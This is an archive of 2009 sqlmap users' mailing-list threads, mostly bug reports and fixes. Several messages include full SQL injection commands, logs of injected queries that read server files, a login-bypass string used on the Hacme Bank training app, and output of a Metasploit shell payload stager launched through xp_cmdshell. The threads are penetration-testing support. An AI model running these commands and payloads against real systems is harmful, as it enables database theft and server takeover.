sqlmap-users — sqlmap users mailing list

Re: [sqlmap-users] GET parameters not being recognised

[Ryan D. <rya...@gm...>]

2009/7/14 Andres Riancho <and...@gm...>:
> Ryan,
>
> On Tue, Jul 14, 2009 at 9:21 AM, Ryan Dewhurst<rya...@gm...> wrote:
>> Hello,
>> While trying to run SQLMap on Windows Vista (PE version) I get the
>> following error:
>>
>> C:\Users\user\Desktop\sqlmap\sqlmap>sqlmap.exe --auth-type=BASIC
>> --auth-cred=user:password@ -u
>> http://localhost/pentest/module.php?ModuleName=com.rating.actions&RatingActionInput
>> Name=ggg&ProductReviewText=ggg&ProductRatingVoteValue=2&action=acExecRate&ProductID=1
>
> You should use quotes around the URL:
>
> sqlmap.exe --auth-type=BASIC --auth-cred=user:password@ -u
> "http://localhost/pentest/module.php?ModuleName=com.rating.actions&RatingActionInputName=ggg&ProductReviewText=ggg&ProductRatingVoteValue=2&action=acExecRate&ProductID=1"
>
> At least that will work on Linux.

Aye that worked! Thanks Andres.

>>    sqlmap/0.6.4 coded by Bernardo Damele A. G. <ber...@gm...>
>>                      and Daniele Bellucci <dan...@gm...>
>>
>> [*] starting at: 13:13:10
>>
>> [13:13:10] [INFO] testing connection to the target url
>> [13:13:13] [INFO] testing if the url is stable, wait a few seconds
>> [13:13:18] [INFO] url is stable
>> [13:13:18] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic
>> [13:13:21] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
>> [13:13:21] [INFO] testing if Cookie parameter
>> 'MIPHPF_SESSION-1631451101' is dynamic
>> [13:13:23] [WARNING] Cookie parameter 'MIPHPF_SESSION-1631451101' is not dynamic
>> [13:13:23] [INFO] testing if GET parameter 'ModuleName' is dynamic
>> [13:13:27] [WARNING] GET parameter 'ModuleName' is not dynamic
>>
>> [*] shutting down at: 13:13:27
>>
>> 'RatingActionInputName' is not recognized as an internal or external command,
>> operable program or batch file.
>> 'ProductReviewText' is not recognized as an internal or external command,
>> operable program or batch file.
>> 'ProductRatingVoteValue' is not recognized as an internal or external command,
>> operable program or batch file.
>> 'action' is not recognized as an internal or external command,
>> operable program or batch file.
>> 'ProductID' is not recognized as an internal or external command,
>> operable program or batch file.
>>
>> Any help much apretiated.
>>
>> Ryan
>>
>> ------------------------------------------------------------------------------
>> Enter the BlackBerry Developer Challenge
>> This is your chance to win up to $100,000 in prizes! For a limited time,
>> vendors submitting new applications to BlackBerry App World(TM) will have
>> the opportunity to enter the BlackBerry Developer Challenge. See full prize
>> details at: http://p.sf.net/sfu/Challenge
>> _______________________________________________
>> sqlmap-users mailing list
>> sql...@li...
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>
>
>
>
> --
> Andrés Riancho
> Founder, Bonsai - Information Security
> http://www.bonsai-sec.com/
> http://w3af.sf.net/
>

Re: [sqlmap-users] GET parameters not being recognised

[Andres R. <and...@gm...>]

Ryan,

On Tue, Jul 14, 2009 at 9:21 AM, Ryan Dewhurst<rya...@gm...> wrote:
> Hello,
> While trying to run SQLMap on Windows Vista (PE version) I get the
> following error:
>
> C:\Users\user\Desktop\sqlmap\sqlmap>sqlmap.exe --auth-type=BASIC
> --auth-cred=user:password@ -u
> http://localhost/pentest/module.php?ModuleName=com.rating.actions&RatingActionInput
> Name=ggg&ProductReviewText=ggg&ProductRatingVoteValue=2&action=acExecRate&ProductID=1

You should use quotes around the URL:

sqlmap.exe --auth-type=BASIC --auth-cred=user:password@ -u
"http://localhost/pentest/module.php?ModuleName=com.rating.actions&RatingActionInputName=ggg&ProductReviewText=ggg&ProductRatingVoteValue=2&action=acExecRate&ProductID=1"

At least that will work on Linux.
>    sqlmap/0.6.4 coded by Bernardo Damele A. G. <ber...@gm...>
>                      and Daniele Bellucci <dan...@gm...>
>
> [*] starting at: 13:13:10
>
> [13:13:10] [INFO] testing connection to the target url
> [13:13:13] [INFO] testing if the url is stable, wait a few seconds
> [13:13:18] [INFO] url is stable
> [13:13:18] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic
> [13:13:21] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
> [13:13:21] [INFO] testing if Cookie parameter
> 'MIPHPF_SESSION-1631451101' is dynamic
> [13:13:23] [WARNING] Cookie parameter 'MIPHPF_SESSION-1631451101' is not dynamic
> [13:13:23] [INFO] testing if GET parameter 'ModuleName' is dynamic
> [13:13:27] [WARNING] GET parameter 'ModuleName' is not dynamic
>
> [*] shutting down at: 13:13:27
>
> 'RatingActionInputName' is not recognized as an internal or external command,
> operable program or batch file.
> 'ProductReviewText' is not recognized as an internal or external command,
> operable program or batch file.
> 'ProductRatingVoteValue' is not recognized as an internal or external command,
> operable program or batch file.
> 'action' is not recognized as an internal or external command,
> operable program or batch file.
> 'ProductID' is not recognized as an internal or external command,
> operable program or batch file.
>
> Any help much apretiated.
>
> Ryan
>
> ------------------------------------------------------------------------------
> Enter the BlackBerry Developer Challenge
> This is your chance to win up to $100,000 in prizes! For a limited time,
> vendors submitting new applications to BlackBerry App World(TM) will have
> the opportunity to enter the BlackBerry Developer Challenge. See full prize
> details at: http://p.sf.net/sfu/Challenge
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>



-- 
Andrés Riancho
Founder, Bonsai - Information Security
http://www.bonsai-sec.com/
http://w3af.sf.net/

[sqlmap-users] GET parameters not being recognised

[Ryan D. <rya...@gm...>]

Hello,
While trying to run SQLMap on Windows Vista (PE version) I get the
following error:

C:\Users\user\Desktop\sqlmap\sqlmap>sqlmap.exe --auth-type=BASIC
--auth-cred=user:password@ -u
http://localhost/pentest/module.php?ModuleName=com.rating.actions&RatingActionInput
Name=ggg&ProductReviewText=ggg&ProductRatingVoteValue=2&action=acExecRate&ProductID=1

    sqlmap/0.6.4 coded by Bernardo Damele A. G. <ber...@gm...>
                      and Daniele Bellucci <dan...@gm...>

[*] starting at: 13:13:10

[13:13:10] [INFO] testing connection to the target url
[13:13:13] [INFO] testing if the url is stable, wait a few seconds
[13:13:18] [INFO] url is stable
[13:13:18] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic
[13:13:21] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
[13:13:21] [INFO] testing if Cookie parameter
'MIPHPF_SESSION-1631451101' is dynamic
[13:13:23] [WARNING] Cookie parameter 'MIPHPF_SESSION-1631451101' is not dynamic
[13:13:23] [INFO] testing if GET parameter 'ModuleName' is dynamic
[13:13:27] [WARNING] GET parameter 'ModuleName' is not dynamic

[*] shutting down at: 13:13:27

'RatingActionInputName' is not recognized as an internal or external command,
operable program or batch file.
'ProductReviewText' is not recognized as an internal or external command,
operable program or batch file.
'ProductRatingVoteValue' is not recognized as an internal or external command,
operable program or batch file.
'action' is not recognized as an internal or external command,
operable program or batch file.
'ProductID' is not recognized as an internal or external command,
operable program or batch file.

Any help much apretiated.

Ryan

[sqlmap-users] Unable to detect database type

[Bryan M. <br...@sy...>]

I recently downloaded the latest version of sqlmap and ran it against a
known database.  I had previously run Scrawlr against the database and it
detected a "verbose" SQL Injection issue.  It told me the database was MS
SQL and it enumerated the database names.  I ran the sqlmap tool and it told
me there as a "LIKE" SQL Injection issue but couldn't detect the database
type.  Am I doing something wrong?  Unfortunately I don't know the exact
version of the MS SQL database to know if it's supported.

 

Re: [sqlmap-users] sqlmap retrieved an odd-length hexadecimal string which it is not able to convert to raw string

[Bernardo D. A. G. <ber...@gm...>]

Hi Patrick,

On Thu, Jul 9, 2009 at 09:28, Patrick Webster<pa...@au...> wrote:
> ./sqlmap.py -v 2 -u target --read-file "C:\boot.ini" --dbms "Microsoft
> SQL Server"

Apparently boot.ini is not in all the Windows systems, give a try to
C:\globdata.ini, C:\install.ini or any other default file within
C:\WINDOWS.

> ...
>   File "/home/patrick/sqlmap/plugins/generic/filesystem.py", line 315,
> in readFile
>     rFilePath = dataToOutFile(fileContent)
>   File "/home/patrick/sqlmap/lib/core/common.py", line 342, in dataToOutFile
>     rFileFP.write(data)
> TypeError: argument 1 must be string or read-only buffer, not list

Thanks for reporting. Fixed and commited.

Cheers,
-- 
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobiles: +447788962949 (UK), +393493821385 (IT)
PGP Key ID: 0x05F5A30F

[sqlmap-users] sqlmap retrieved an odd-length hexadecimal string which it is not able to convert to raw string

[Patrick W. <pa...@au...>]

./sqlmap.py -v 2 -u target --read-file "C:\boot.ini" --dbms "Microsoft
SQL Server"

    sqlmap/0.7rc3
    by Bernardo Damele A. G. <ber...@gm...>

[*] starting at: 18:26:09

[18:26:09] [DEBUG] initializing the configuration
[18:26:09] [DEBUG] initializing the knowledge base
[18:26:09] [DEBUG] cleaning up configuration parameters
[18:26:09] [DEBUG] setting the HTTP timeout
[18:26:09] [DEBUG] setting the HTTP method to GET
[18:26:09] [DEBUG] forcing back-end DBMS to user defined value
[18:26:09] [DEBUG] creating HTTP requests opener object
[18:26:09] [DEBUG] parsing XML queries file
[18:26:09] [INFO] testing connection to the target url
[18:26:10] [INFO] testing if the url is stable, wait a few seconds
[18:26:11] [INFO] url is stable
[18:26:11] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic
[18:26:12] [WARNING] User-Agent parameter 'User-Agent' is not dynamic

[18:26:12] [INFO] testing if GET parameter 'id' is dynamic
[18:26:13] [DEBUG] setting match ratio to default value 0.900
[18:26:13] [INFO] confirming that GET parameter 'id' is dynamic
[18:26:13] [INFO] GET parameter 'id' is dynamic
[18:26:13] [INFO] testing sql injection on GET parameter 'id' with 0 parenthesis
[18:26:13] [INFO] testing unescaped numeric injection on GET parameter 'id'
[18:26:14] [INFO] confirming unescaped numeric injection on GET parameter 'id'
[18:26:14] [INFO] GET parameter 'id' is unescaped numeric injectable
with 0 parenthesis
[18:26:14] [INFO] testing for parenthesis on injectable parameter
[18:26:15] [INFO] the injectable parameter requires 0 parenthesis
[18:26:15] [DEBUG] skipping test for MySQL
[18:26:15] [DEBUG] skipping test for Oracle
[18:26:15] [DEBUG] skipping test for PostgreSQL
[18:26:15] [INFO] testing Microsoft SQL Server
[18:26:15] [INFO] confirming Microsoft SQL Server
[18:26:16] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2000
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000

[18:26:16] [INFO] testing stacked queries support on parameter 'id'
[18:26:16] [DEBUG] query: WAITFOR DELAY '0:0:5'
[18:26:21] [INFO] the web application supports stacked queries on parameter 'id'
[18:26:21] [DEBUG] going to read the file with stacked query SQL
injection technique
[18:26:21] [INFO] fetching file: 'C:/boot.ini'
[18:26:21] [DEBUG] query: DROP TABLE sqlmapfile
[18:26:21] [DEBUG] query: CREATE TABLE sqlmapfile(data text)
[18:26:21] [DEBUG] query: DROP TABLE sqlmapfilehex
[18:26:22] [DEBUG] query: CREATE TABLE sqlmapfilehex(id INT
IDENTITY(1, 1) PRIMARY KEY, data VARCHAR(4096))
[18:26:22] [DEBUG] loading the content of file 'C:/boot.ini' into support table
[18:26:22] [DEBUG] query: BULK INSERT sqlmapfile FROM 'C:/boot.ini'
WITH (CODEPAGE='RAW', FIELDTERMINATOR='PXrRMcjmNR',
ROWTERMINATOR='EHMuHbObaJ')
[18:26:22] [DEBUG] query:
%20DECLARE%20%40charset%20VARCHAR%2816%29%20DECLARE%20%40counter%20INT%20DECLARE%20%40hexstr%20VARCHAR%284096%29%20DECLARE%20%40length%20INT%20DECLARE%20%40chunk%20INT%20%20SET%20%40charset%20%3D%20%270123456789ABCDEF%27%20SET%20%40counter%20%3D%201%20SET%20%40hexstr%20%3D%20%27%27%20SET%20%40length%20%3D%20%28SELECT%20DATALENGTH%28data%29%20FROM%20sqlmapfile%29%20SET%20%40chunk%20%3D%201024%20%20WHILE%20%28%40counter%20%3C%3D%20%40length%29%20BEGIN%20DECLARE%20%40tempint%20INT%20DECLARE%20%40firstint%20INT%20DECLARE%20%40secondint%20INT%20%20SET%20%40tempint%20%3D%20CONVERT%28INT%2C%20%28SELECT%20ASCII%28SUBSTRING%28data%2C%20%40counter%2C%201%29%29%20FROM%20sqlmapfile%29%29%20SET%20%40firstint%20%3D%20floor%28%40tempint/16%29%20SET%20%40secondint%20%3D%20%40tempint%20-%20%28%40firstint%20%2A%2016%29%20SET%20%40hexstr%20%3D%20%40hexstr%20%2B%20SUBSTRING%28%40charset%2C%20%40firstint%2B1%2C%201%29%20%2B%20SUBSTRING%28%40charset%2C%20%40secondint%2B1%2C%201%29%20%20SET%20%40counter%20%3D%20%40counter%20%2B%201%20%20IF%20%40counter%20%25%20%40chunk%20%3D%200%20BEGIN%20INSERT%20INTO%20sqlmapfilehex%28data%29%20VALUES%28%40hexstr%29%20SET%20%40hexstr%20%3D%20%27%27%20END%20END%20%20IF%20%40counter%20%25%20%28%40chunk%29%20%21%3D%200%20BEGIN%20INSERT%20INTO%20sqlmapfilehex%28data%29%20VALUES%28%40hexstr%29%20END%20
[18:26:22] [DEBUG] query: SELECT ISNULL(CAST(COUNT(data) AS
VARCHAR(8000)), CHAR(32)) FROM sqlmapfilehex
[18:26:22] [INFO] retrieved: 1
[18:26:24] [DEBUG] performed 6 queries in 2 seconds
[18:26:24] [DEBUG] query: SELECT TOP 1 ISNULL(CAST(data AS
VARCHAR(8000)), CHAR(32)) FROM sqlmapfilehex WHERE data NOT IN (SELECT
TOP 0 data FROM sqlmapfilehex ORDER BY id ASC) ORDER BY id ASC
[18:26:24] [INFO] retrieved:
[18:26:26] [DEBUG] performed 4 queries in 1 seconds
[18:26:26] [DEBUG] query: DROP TABLE sqlmapfilehex
[18:26:26] [ERROR] for some reasons sqlmap retrieved an odd-length
hexadecimal string which it is not able to convert to raw string
[18:26:26] [ERROR] unhandled exception in sqlmap/0.7rc3, please copy
the command line and the following text and send by e-mail to
sql...@li.... The developer will fix it as soon
as possible:
sqlmap version: 0.7rc3
Python version: 2.4.3
Operating system: linux2
Traceback (most recent call last):
  File "./sqlmap.py", line 84, in main
    start()
  File "/home/patrick/skychannel/sqlmap/lib/controller/controller.py",
line 263, in start
  File "/home/patrick/skychannel/sqlmap/lib/controller/action.py",
line 130, in action
  File "/home/patrick/sqlmap/plugins/generic/filesystem.py", line 315,
in readFile
    rFilePath = dataToOutFile(fileContent)
  File "/home/patrick/sqlmap/lib/core/common.py", line 342, in dataToOutFile
    rFileFP.write(data)
TypeError: argument 1 must be string or read-only buffer, not list

[*] shutting down at: 18:26:26

Re: [sqlmap-users] sqlmap and Hacme Bank

[Giorgio F. <gio...@gm...>]

Hi Richard,

as far as I remember, Hackme Bank login page replies to the user with
a temporary redirect.
Sqlmap will see the same answer from both the false and the true injection.
Btw the reason why sqlmap may not work is that it does not follow the
302 redirect to the new location specified in the response.

Having sqlmap working with Hackme Bank would be very useful for
training purposes; hope to be helpful in the solution of the problem.

Giorgio


2009/6/18 Richard Jones <wp...@gm...>:
> Hi all,
>
> Sorry this ended up so long.....I wanted to fully explain my situation  :)
>
> I've been playing with sqlmap against Foundstone's Hacme Bank and have been
> making some progress.
>
> Here is the command I've come up with:
>
> ./sqlmap.py -u "http://192.168.200.11/HacmeBank_v2_Website/aspx/login.aspx"
> --method=POST -p "txtUserName"
> --cookie="ASP.NET_SessionId=0gsfp055bufm5ezo0dty242l; CookieLoginAttempts=5;
> Admin=false"
> --data="__VIEWSTATE=dDwtNDI1MDU4NDs7PitrIWDP7fNwEW6ShMscWylYqLTi&txtUserName=jv&txtPassword=asdf&btnSubmit=Submit"
> -v 5 --prefix="'" --postfix=" OR 1=1--" --batch
>
> I can confirm that this command is able to gain access to the HacmeBank site
> with this crafted string:  jv' AND 1322=1322  OR 1=1-- (Unicode decoded, of
> course).  Some other crafted strings from sqlmap are successful as well.
>
> BUT, sqlmap doesn't seem to detect that it is successful in gaining access.
> I think the problem exists in the --regexp string.....as in I can't find a
> regexp that works....
>
> From the sqlmap docs, --regexp lets the user "provide a string which is
> always present on the not injected page and on all True injected query
> pages, but that it is not on the False ones".  The problem I think am I
> running into is finding a string that is present on the not injected page,
> but no on the false pages.
>
> The strings that I have been trying to match are:
> Not Injected Page:     Message"></span>
> True Injected Page:    Message">Line 1: Incorrect syntax near 'asdf'.</span>
> False Injected Page:  Message">Invalid Login</span>
>
> My question is how is the "not injected" page detected?  When watching the
> output on level 5 verbosity, I see this request.  I assume this is the
> request to determine the "Not Injected" page?
>
> [11:42:28] [INFO] testing if the provided regular expression matches within
> the target URL page content
> [11:42:30] [TRAFFIC OUT] HTTP request:
> POST /HacmeBank_v2_Website/aspx/login.aspx HTTP/1.1
> Content-length: 105
> Accept-language: en-us,en;q=0.5
> Connection: Keep-Alive
> Accept:
> text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
> User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net)
> Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
> Host: 192.168.200.11:80
> Cookie: ASP.NET_SessionId=0gsfp055bufm5ezo0dty242l; CookieLoginAttempts=5;
> Admin=false
> Content-type: application/x-www-form-urlencoded
> __VIEWSTATE=dDwtNDI1MDU4NDs7PitrIWDP7fNwEW6ShMscWylYqLTi&txtUserName=jv&txtPassword=asdf&btnSubmit=Submit
>
> This request sends in the POST data that I provided at the command line.
> This data causes an "Invalid Login" from the login page, which is exactly
> what happens when a False injected query occurs as well.  In fact, the HTML
> that comes back from this "Not Injected" request is identical to the HTML
> that comes back from a False injected page.
>
> So, in this situation, I feel that sqlmap isn't requesting the "Not
> Injected" page correctly.  In my mind, that would involve a GET request,
> with no login data, to login.aspx, not a POST to that page.  The GET should
> return a page that doesn't have the "Invalid Login" text that gets returned
> to a POST with invalid credentials.
>
> So, can I get sqlmap to detect the "Not Injected" page with a simple GET
> request, but then perform the sql injection using POST requests?  Or is
> there something else that needs done?  I tried changing --method to GET, as
> well as removing --method, but the GET that is sent for the "Not Injected"
> page still contains the POST data, which still results in "Invalid Login".
>
> Or I am confused on how this should work?
>
> Thanks!
>
> Richard
>
> ------------------------------------------------------------------------------
> Crystal Reports - New Free Runtime and 30 Day Trial
> Check out the new simplified licensing option that enables unlimited
> royalty-free distribution of the report engine for externally facing
> server and web deployment.
> http://p.sf.net/sfu/businessobjects
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>

Re: [sqlmap-users] sqlmap-svn, errors when using metasploit

[Bernardo D. A. G. <ber...@gm...>]

Fixed and commited.
Thanks for reporting.

On Mon, Jul 6, 2009 at 15:11, Simon Baker<Si...@se...> wrote:
> ...
>     chunkName  = self.updateBinChunk(wFileChunk, dFile, tmpPath)
>
> TypeError: updateBinChunk() takes exactly 3 arguments (4 given)


-- 
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobiles: +447788962949 (UK), +393493821385 (IT)
PGP Key ID: 0x05F5A30F

[sqlmap-users] sqlmap-svn, errors when using metasploit

[Simon B. <Si...@se...>]

Hi Guys,

Seems theres an error with the arguments being passed when trying to utilise metasploit to spawn a shell or similar.  Theres also an error in the messages displayed when the user is entering parameters too, somethings getting screwy somewhere :(

S.


Snip....

[15:04:30] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2000
web application technology: ASP.NET, ASP, Microsoft IIS 5.0
back-end DBMS: Microsoft SQL Server 2005

[15:04:30] [INFO] testing stacked queries support on parameter 'cat1'
[15:04:40] [INFO] the web application supports stacked queries on parameter 'cat1'
[15:04:40] [INFO] testing if current user is DBA
[15:04:40] [INFO] retrieved: 1
[15:04:43] [INFO] checking if xp_cmdshell extended procedure is available, wait..
[15:04:55] [INFO] xp_cmdshell extended procedure is available
[15:04:55] [INFO] creating Metasploit Framework 3 payload stager
which connection type do you want to use?
[1] Bind TCP (default)
o NX)ind TCP (N
[3] Reverse TCP
[4] Reverse TCP (No NX)
> 1
which is the back-end DBMS address? [172.31.1.6]
which remote port numer do you want to use? [23986]
which payload do you want to use?
[1] Reflective Meterpreter (default)
preterter
[3] Shell
[4] Reflective VNC
[5] VNC
> 5
[15:05:36] [WARNING] it is unlikely that the VNC injection will be successful because often Microsoft SQL Server 2005 runs as Network Service or the Administrator is not logged in
what do you want to do?
[1] Give it a try anyway
erpreter payload (default)e Met
[3] Fall back to Shell payload
> 1
do you want sqlmap to upload Churrasco and call the Metasploit payload stager as its argument so that it will be started as SYSTEM? [Y/n]
[15:06:07] [INFO] the binary file is bigger than 65280 bytes. sqlmap will split it into chunks, upload them and recreate the original file out of the binary chunks server-side, wait..
[15:06:07] [ERROR] unhandled exception in sqlmap/0.7rc3, please copy the command line and the following text and send by e-mail to sql...@li.... The developer will fix it as soon as possible:
sqlmap version: 0.7rc3
Python version: 2.5.1
Operating system: darwin
Traceback (most recent call last):
  File "./sqlmap.py", line 84, in main
    start()
  File "/Users/simonbaker/tools/sqlmap/lib/controller/controller.py", line 263, in start
    action()
  File "/Users/simonbaker/tools/sqlmap/lib/controller/action.py", line 143, in action
    conf.dbmsHandler.osPwn()
  File "/Users/simonbaker/tools/sqlmap/plugins/generic/takeover.py", line 312, in osPwn
    self.createMsfPayloadStager()
  File "/Users/simonbaker/tools/sqlmap/lib/takeover/metasploit.py", line 603, in createMsfPayloadStager
    self.__prepareIngredients()
  File "/Users/simonbaker/tools/sqlmap/lib/takeover/metasploit.py", line 330, in __prepareIngredients
    self.payloadStr     = self.__selectPayload(askChurrasco)
  File "/Users/simonbaker/tools/sqlmap/lib/takeover/metasploit.py", line 263, in __selectPayload
    uploaded = self.uploadChurrasco()
  File "/Users/simonbaker/tools/sqlmap/plugins/generic/takeover.py", line 263, in uploadChurrasco
    self.writeFile(wFile, self.churrascoPath, "binary", confirm=False)
  File "/Users/simonbaker/tools/sqlmap/plugins/generic/filesystem.py", line 338, in writeFile
    self.stackedWriteFile(wFile, dFile, fileType, confirm)
  File "/Users/simonbaker/tools/sqlmap/plugins/dbms/mssqlserver.py", line 544, in stackedWriteFile
    chunkName  = self.updateBinChunk(wFileChunk, dFile, tmpPath)
TypeError: updateBinChunk() takes exactly 3 arguments (4 given)

[*] shutting down at: 15:06:07

Simon Baker
Penetration Tester

Sec-1 Ltd
T: 0113 2578955
F: 0113 2579718


This e-mail and any attached files are confidential and may also be legally privileged. They are intended solely for the intended addressee. If you are not the addressee please e-mail it back to the sender and then immediately, permanently delete it. Do not read, print, re-transmit, store or act in reliance on it. This e-mail may be monitored by Sec-1 Ltd in accordance with current regulations. This footnote also confirms that this e-mail message has been swept for the presence of computer viruses currently known to Sec-1 Ltd. However, the recipient is responsible for virus-checking before opening this message and any attachment. Unless expressly stated to the contrary, any views expressed in this message are those of the individual sender and may not necessarily reflect the views of Sec-1 Ltd.
Registered Name: Sec-1 Ltd, Registration Number: 4138637, Registered Office Address: Unit 4, Spring Valley Park, Butler Way, Stanningley, Leeds, LS28 6EA.

[sqlmap-users] Fwd: sqlmap error

[Bernardo D. A. G. <ber...@gm...>]

---------- Forwarded message ----------
From: sql pirate <sql...@go...>
Date: Wed, Jun 24, 2009 at 21:59
Subject: Re: [sqlmap-users] sqlmap error
To: "Bernardo Damele A. G." <ber...@gm...>


Hi Bernando,

thanks for your help. Your tool works now for this vulnerability!
Though I have some other restrictions from the application now which
prevents me from extracting data :-(

Cheers,

Jan

2009/6/24 Bernardo Damele A. G. <ber...@gm...>
>
> Hi,
>
> On Mon, Jun 22, 2009 at 14:03, sql pirate<sql...@go...> wrote:
> > ...
> > ./sqlmap.py -u
> > "http://www.example.com/system/listinstances.nav?FORMULARNAME=listinstances&FORMULARSEGMENT=0&FLD_maxElementsListInstances=5&FLD_listInstancesOrderBy=1"
> > -p FLD_listInstancesOrderBy --string=rowHighSmall
> > --proxy=http://127.0.0.1:8080/
> > --cookie="JSESSIONID=1RjDK1vK9NMkyJ7tWPWks9wTYyYz22h5pTQ2qTWVx6pQVhxC2nVg"
> > --delay=1 --prefix="%2b(select%20case%20when%201=1"
> > --postfix="then%201%20else%201/0%20end%20from%20dual)" --sql-query="select
> > 'bla' from dual"
> > ...
> >     forgedPayload = payload % (expressionUnescaped, idx, limit)
> > ValueError: unsupported format character 'b' (0x62) at index 104
> > ...
>
> Use latest sqlmap from subversion repository.
> Avoid uri encoding in --prefix and --postfix options' value. sqlmap
> uri encode the HTTP request parameters properly automatically.
>
> Cheers,
> --
> Bernardo Damele A. G.
>
> E-mail / Jabber: bernardo.damele (at) gmail.com
> Mobiles: +447788962949 (UK), +393493821385 (IT)
> PGP Key ID: 0x05F5A30F




-- 
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobiles: +447788962949 (UK), +393493821385 (IT)
PGP Key ID: 0x05F5A30F

Re: [sqlmap-users] unhandled exception in sqlmap/0.7rc3

[Bernardo D. A. G. <ber...@gm...>]

Hi Daniel,

On Tue, Jun 23, 2009 at 23:49, Daniel Hückmann<san...@gm...> wrote:
> This occurred when resuming a session I was working on last night.
>
> After rerunning the same command without --eta it continued successfully.
>
> ./sqlmap.py -u http://www.[REMOVED].com/[REMOVED]/page.php?value=1 -s
> youlosethegame --dump-all --eta
> ...
>   File "/home/sbit/Workspace/sqlmap/lib/core/progress.py", line 39, in
> __init__
>     self.__max = int(maxValue)
> ValueError: invalid literal for int() with base 10: ''
> ...

It should be fixed now, otherwise get back to me with the session file
obfuscated where needed.
Thanks for reporting this bug.

Cheers,
-- 
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobiles: +447788962949 (UK), +393493821385 (IT)
PGP Key ID: 0x05F5A30F

Re: [sqlmap-users] sqlmap error

[Bernardo D. A. G. <ber...@gm...>]

Hi,

On Mon, Jun 22, 2009 at 14:03, sql pirate<sql...@go...> wrote:
> ...
> ./sqlmap.py -u
> "http://www.example.com/system/listinstances.nav?FORMULARNAME=listinstances&FORMULARSEGMENT=0&FLD_maxElementsListInstances=5&FLD_listInstancesOrderBy=1"
> -p FLD_listInstancesOrderBy --string=rowHighSmall
> --proxy=http://127.0.0.1:8080/
> --cookie="JSESSIONID=1RjDK1vK9NMkyJ7tWPWks9wTYyYz22h5pTQ2qTWVx6pQVhxC2nVg"
> --delay=1 --prefix="%2b(select%20case%20when%201=1"
> --postfix="then%201%20else%201/0%20end%20from%20dual)" --sql-query="select
> 'bla' from dual"
> ...
>     forgedPayload = payload % (expressionUnescaped, idx, limit)
> ValueError: unsupported format character 'b' (0x62) at index 104
> ...

Use latest sqlmap from subversion repository.
Avoid uri encoding in --prefix and --postfix options' value. sqlmap
uri encode the HTTP request parameters properly automatically.

Cheers,
-- 
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobiles: +447788962949 (UK), +393493821385 (IT)
PGP Key ID: 0x05F5A30F

Re: [sqlmap-users] sqlmap and Hacme Bank

[Bernardo D. A. G. <ber...@gm...>]

Hi Richard,

On Tue, Jun 23, 2009 at 21:02, Richard Jones<wp...@gm...> wrote:
> ...
> The strings that I have been trying to match are:
> Not Injected Page:     Message"></span>
> True Injected Page:    Message">Line 1: Incorrect syntax near 'asdf'.</span>
> False Injected Page:  Message">Invalid Login</span>
>
> My question is how is the "not injected" page detected?  When watching the
> output on level 5 verbosity, I see this request.  I assume this is the
> request to determine the "Not Injected" page?

First of all, sqlmap has no good support for SQL injection in login
forms yet. I have to refactor the engine to improve the comparison
algorithm to make it properly detect injection points in login forms
where, usually, the not injected (original) page differs from both
True/False pages and the match is to be done on the True injected page
only. I will be working on this in the long run.

This said, if you are sure that the True injection page has only that
string to match on, use --string "Line 1", but still, it won't work
because at this time sqlmap needs to have the string also in the Not
injected page.

> ...
> So, can I get sqlmap to detect the "Not Injected" page with a simple GET
> request, but then perform the sql injection using POST requests?  Or is
> there something else that needs done?  I tried changing --method to GET, as
> well as removing --method, but the GET that is sent for the "Not Injected"
> page still contains the POST data, which still results in "Invalid Login".

Unfortunately not at this time. I will work on it as time permits.

Thanks for reporting.

Cheers,
-- 
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobiles: +447788962949 (UK), +393493821385 (IT)
PGP Key ID: 0x05F5A30F

[sqlmap-users] unhandled exception in sqlmap/0.7rc3

[Daniel H. <san...@gm...>]

This occurred when resuming a session I was working on last night.

After rerunning the same command without --eta it continued successfully.

./sqlmap.py -u http://www.[REMOVED].com/[REMOVED]/page.php?value=1 -s
youlosethegame --dump-all --eta


Linux odin 2.6.28-13-generic #44-Ubuntu SMP Tue Jun 2 07:57:31 UTC 2009 i686
GNU/Linux

sqlmap version: 0.7rc3
Python version: 2.6.2
Operating system: linux2
Traceback (most recent call last):
  File "./sqlmap.py", line 84, in main
    start()
  File "/home/sbit/Workspace/sqlmap/lib/controller/controller.py", line 263,
in start
    action()
  File "/home/sbit/Workspace/sqlmap/lib/controller/action.py", line 120, in
action
    conf.dbmsHandler.dumpAll()
  File "/home/sbit/Workspace/sqlmap/plugins/generic/enumeration.py", line
1091, in dumpAll
    data = self.dumpTable()
  File "/home/sbit/Workspace/sqlmap/plugins/generic/enumeration.py", line
1031, in dumpTable
    value = inject.getValue(query, inband=False)
  File "/home/sbit/Workspace/sqlmap/lib/request/inject.py", line 378, in
getValue
    value = __goInferenceProxy(expression, fromUser, expected, batch,
resumeValue, unpack, charsetType)
  File "/home/sbit/Workspace/sqlmap/lib/request/inject.py", line 308, in
__goInferenceProxy
    outputs = __goInferenceFields(expression, expressionFields,
expressionFieldsList, payload, expected, resumeValue=resumeValue,
charsetType=charsetType)
  File "/home/sbit/Workspace/sqlmap/lib/request/inject.py", line 99, in
__goInferenceFields
